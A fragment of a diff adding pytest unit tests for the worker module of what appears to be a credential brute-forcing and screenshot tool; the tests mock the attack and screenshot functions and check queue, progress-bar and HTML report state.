     70 + screenshot_task = worker.PROGRESS_BAR.tasks[worker.SCREENSHOT_PROGRESS]
     71 + 
     72 + _attack_credentials_good = lambda t: t
     73 + monkeypatch.setattr(worker, "attack_credentials", _attack_credentials_good)
     74 + 
     75 + worker.brute_credentials(input_queue, output_queue)
     76 + assert input_queue.qsize() == 0
     77 + assert str(target) == output_queue.get()
     78 + assert output_queue.qsize() == 0
     79 + assert brute_task.finished
     80 + assert brute_task.remaining == 0
     81 + assert not screenshot_task.finished
     82 + assert screenshot_task.remaining == 1
     83 + 
     84 + def test_without_result(self, queues, monkeypatch):
     85 + input_queue, output_queue = queues
     86 + worker.PROGRESS_BAR = ProgressBar()
     87 + worker.BRUTE_PROGRESS = worker.PROGRESS_BAR.add_task("Brute", total=1)
     88 + worker.SCREENSHOT_PROGRESS = worker.PROGRESS_BAR.add_task("Screenshot", total=0)
     89 + brute_task = worker.PROGRESS_BAR.tasks[worker.BRUTE_PROGRESS]
     90 + screenshot_task = worker.PROGRESS_BAR.tasks[worker.SCREENSHOT_PROGRESS]
     91 + 
     92 + _attack_credentials_bad = lambda t: False
     93 + monkeypatch.setattr(worker, "attack_credentials", _attack_credentials_bad)
     94 + 
     95 + worker.brute_credentials(input_queue, output_queue)
     96 + assert input_queue.qsize() == 0
     97 + assert output_queue.qsize() == 0
     98 + assert brute_task.finished
     99 + assert brute_task.remaining == 0
     100 + assert screenshot_task.finished
     101 + assert screenshot_task.remaining == 0
     102 + 
     103 + 
     104 +class TestScreenshotTargets:
     105 + def test_with_result(self, queues, tmp_path, result_file, html_file, monkeypatch):
     106 + input_queue, _ = queues
     107 + worker.PROGRESS_BAR = ProgressBar()
     108 + worker.SCREENSHOT_PROGRESS = worker.PROGRESS_BAR.add_task("Screenshot", total=1)
     109 + screenshot_task = worker.PROGRESS_BAR.tasks[worker.SCREENSHOT_PROGRESS]
     110 + 
     111 + pic_file = tmp_path / "pic.jpg"
     112 + pic_file.open("w", encoding="utf-8")
     113 + _get_screenshot_good = lambda t: pic_file
     114 + 
     115 + monkeypatch.setattr(worker, "get_screenshot", _get_screenshot_good)
     116 + 
     117 + worker.screenshot_targets(input_queue)
     118 + assert input_queue.qsize() == 0
     119 + assert str(target) in result_file.read_text()
     120 + assert f'src="{pic_file.parent.name}/{pic_file.name}"' in html_file.read_text()
     121 + assert f'alt="{target}"' in html_file.read_text()
     122 + assert screenshot_task.finished
     123 + assert screenshot_task.remaining == 0
     124 + 
     125 + def test_without_result(self, queues, monkeypatch):
     126 + input_queue, _ = queues
     127 + worker.PROGRESS_BAR = ProgressBar()
     128 + worker.SCREENSHOT_PROGRESS = worker.PROGRESS_BAR.add_task("Screenshot", total=1)
     129 + screenshot_task = worker.PROGRESS_BAR.tasks[worker.SCREENSHOT_PROGRESS]
     130 + 
     131 + _get_screenshot_bad = lambda t: False
     132 + monkeypatch.setattr(worker, "get_screenshot", _get_screenshot_bad)
     133 + 
     134 + worker.screenshot_targets(input_queue)
     135 + assert input_queue.qsize() == 0
     136 + assert screenshot_task.finished
     137 + assert screenshot_task.remaining == 0
     138 + 
Please wait...
Page is in error, reload to recover